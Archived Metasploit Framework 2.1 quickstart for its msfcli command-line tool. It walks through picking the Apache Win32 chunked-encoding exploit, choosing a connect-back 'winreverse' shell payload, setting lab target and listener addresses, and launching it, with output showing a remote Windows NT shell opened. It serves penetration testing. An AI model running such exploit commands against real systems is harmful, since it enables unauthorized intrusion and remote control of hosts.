home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / docs / QUICKSTART.msfcli < prev    next >
Text File  |  2006-06-30  |  7KB  |  185 lines

  1. 1) List the available exploits and select one
  2.  
  3. hdm@slasher framework $ ./msfcli
  4.                 __.                       .__.        .__. __.
  5.   _____   _____/  |______    ____________ |  |   ____ |__|/  |_
  6.  /     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
  7. |  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
  8. |__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
  9.       \/     \/  v2.1    \/     \/ |__|
  10.  
  11. ============
  12. = Exploits
  13.  
  14.   apache_chunked_win32       Apache Win32 Chunked Encoding
  15.   blackice_pam_icq           Blackice/RealSecure/Other ISS ICQ Parser Buffer Overflow
  16.   exchange2000_xexch50       Exchange 2000 MS03-46 Heap Overflow
  17.   frontpage_fp30reg_chunked  Frontpage fp30reg.dll Chunked Encoding
  18.   ia_webmail                 IA WebMail 3.x Buffer Overflow
  19.   iis50_nsiislog_post        IIS 5.0 nsiislog.dll POST Overflow
  20.   iis50_printer_overflow     IIS 5.0 Printer Buffer Overflow
  21.   iis50_webdav_ntdll         IIS 5.0 WebDAV ntdll.dll Overflow
  22.   imail_ldap                 IMail LDAP Service Buffer Overflow
  23.   msrpc_dcom_ms03_026        Microsoft RPC DCOM MSO3-026
  24.   msrpc_dcom_ms03_039        Microsoft RPC DCOM MSO3-039
  25.   mssql2000_resolution       MSSQL 2000 Resolution Overflow
  26.   poptop_negative_read       PoPToP Negative Read Overflow
  27.   realserver_describe_linux  RealServer Describe Buffer Overflow
  28.   samba_nttrans              Samba Fragment Reassembly Overflow
  29.   samba_trans2open           Samba trans2open Overflow
  30.   sambar6_search_results     Sambar 6 Search Results Buffer Overflow
  31.   servu_mdtm_overflow        Serv-U FTPD MDTM Overflow
  32.   solaris_sadmind_exec       Solaris sadmind Command Execution
  33.   subversion_date            PoPToP Negative Read Overflow
  34.   warftpd_165_pass           War-FTPD 1.65 PASS Overflow
  35.   windows_ssl_pct            Windows SSL PCT Overflow
  36.  
  37. 2) Display the information for the selected exploit
  38.  
  39. hdm@slasher framework $ ./msfcli apache S
  40.       Name: Apache Win32 Chunked Encoding
  41.    Version: $Revision: 1.7 $
  42.  Target OS: win32
  43. Privileged: Yes
  44.  
  45. Provided By:
  46.     H D Moore <hdm [at] metasploit.com> [Artistic License]
  47.  
  48. Available Targets:
  49.     Windows NT/2K Brute Force
  50.     Windows 2000
  51.     Windows NT
  52.  
  53. Available Options:
  54.  
  55.     Exploit:    Name      Default    Description
  56.     --------    ------    -------    ---------------------------
  57.     optional    SSL                  Use SSL
  58.     required    RHOST                The target address
  59.     optional    PAD                  Specify the exact pad value
  60.     required    RPORT     80         The target port
  61.  
  62. Payload Information:
  63.     Space: 8100
  64.     Avoid: 8 characters
  65.  
  66. Description:
  67.     This exploits the chunked encoding bug found in Apache
  68.     versions 1.2.x to 1.3.24. This particular module will only
  69.     work reliably against versions 1.3.17 on up running on
  70.     Windows 2000 or NT. This exploit may complelely crash
  71.     certain versions of Apache shipped with Oracle and various
  72.     web application frameworks. This exploit could not be
  73.     detected by versions of the Snort IDS prior to 2.1.2 :)
  74.  
  75. References:
  76.     http://www.osvdb.org/838
  77.     http://lists.insecure.org/lists/bugtraq/2002/Jun/0184.html
  78.  
  79.  
  80.  
  81.  
  82. 3) Show the available payloads
  83.  
  84. hdm@slasher framework $ ./msfcli apache P
  85. Metasploit Framework Usable Payloads
  86. ====================================
  87.  
  88.   winadduser               Create a new user and add to local Administrators group
  89.   winbind                  Listen for connection and spawn a shell
  90.   winbind_stg              Listen for connection and spawn a shell
  91.   winbind_stg_upexec       Listen for connection then upload and exec file
  92.   winexec                  Execute an arbitrary command
  93.   winreverse               Connect back to attacker and spawn a shell
  94.   winreverse_stg           Connect back to attacker and spawn a shell
  95.   winreverse_stg_ie        Listen for connection, send address of GP/LL across, read/exec InlineEgg
  96.   winreverse_stg_upexec    Connect back to attacker and spawn a shell
  97.  
  98.  
  99.  
  100.  
  101. 4) Choose a payload and show the new combined option set
  102.  
  103. hdm@slasher framework $ ./msfcli apache PAYLOAD=winreverse O
  104.  
  105. Exploit and Payload Options
  106. ===========================
  107.  
  108.   Exploit:    Name      Default    Description
  109.   --------    ------    -------    ---------------------------
  110.   optional    SSL                  Use SSL
  111.   required    RHOST                The target address
  112.   optional    PAD                  Specify the exact pad value
  113.   required    RPORT     80         The target port
  114.  
  115.   Payload:    Name        Default    Description
  116.   --------    --------    -------    ------------------------------------------
  117.   optional    EXITFUNC    seh        Exit technique: "process", "thread", "seh"
  118.   required    LHOST                  Local address to receive connection
  119.   required    LPORT                  Local port to receive connection
  120.     
  121.                                                                                                                 
  122.  
  123.  
  124. 5) Some exploits and payloads include an advanced option set
  125.  
  126. hdm@slasher framework $ ./msfcli apache PAYLOAD=winreverse A
  127.  
  128. Exploit and Payload Options
  129. ===========================
  130.  
  131.   Exploit (Msf::Exploit::apache_chunked_win32):
  132.   ---------------------------------------------
  133.   Name:     PAD
  134.   Default:  0
  135.  
  136.   Specify the padding value to be used
  137.  
  138.   Payload (Msf::Payload::win32_reverse):
  139.   --------------------------------------
  140.  
  141.  
  142.  
  143.  
  144. 6) List the available targets and optionally select one
  145.  
  146. hdm@slasher framework $ ./msfcli apache PAYLOAD=winreverse T
  147.  
  148. Supported Exploit Targets
  149. =========================
  150.  
  151.    0  Windows NT/2K Brute Force
  152.    1  Windows 2000
  153.    2  Windows NT
  154.  
  155.  
  156.                                                                                              
  157.  
  158.  
  159. 5) Fill in options and try a vulnerability check
  160.  
  161. hdm@slasher framework $ ./msfcli apache \
  162. PAYLOAD=winreverse RHOST=192.168.1.241 RPORT=8080 \
  163. LHOST=192.168.1.244 LPORT=5555 TARGET=2 C
  164.  
  165. [*] Vulnerable server 'Apache/1.3.22 (Win32)'
  166.  
  167.  
  168.  
  169.  
  170. 6) Launch the actual exploit :)
  171.  
  172. hdm@slasher framework $ ./msfcli apache \
  173. PAYLOAD=winreverse RHOST=192.168.1.241 RPORT=8080 \
  174. LHOST=192.168.1.244 LPORT=5555 TARGET=2 E
  175.  
  176. [*] Trying to exploit Windows NT using return 0x1c0f1022 with padding of 348...
  177. [*] Trying to exploit Windows NT using return 0x1c0f1022 with padding of 352...
  178. [*] Connection from 192.168.1.241:1033...
  179.                                                                                                                 
  180. Microsoft(R) Windows NT(TM)
  181. (C) Copyright 1985-1996 Microsoft Corp.
  182.                                                                                                                 
  183. c:\program files\apache group\apache>
  184.  
  185.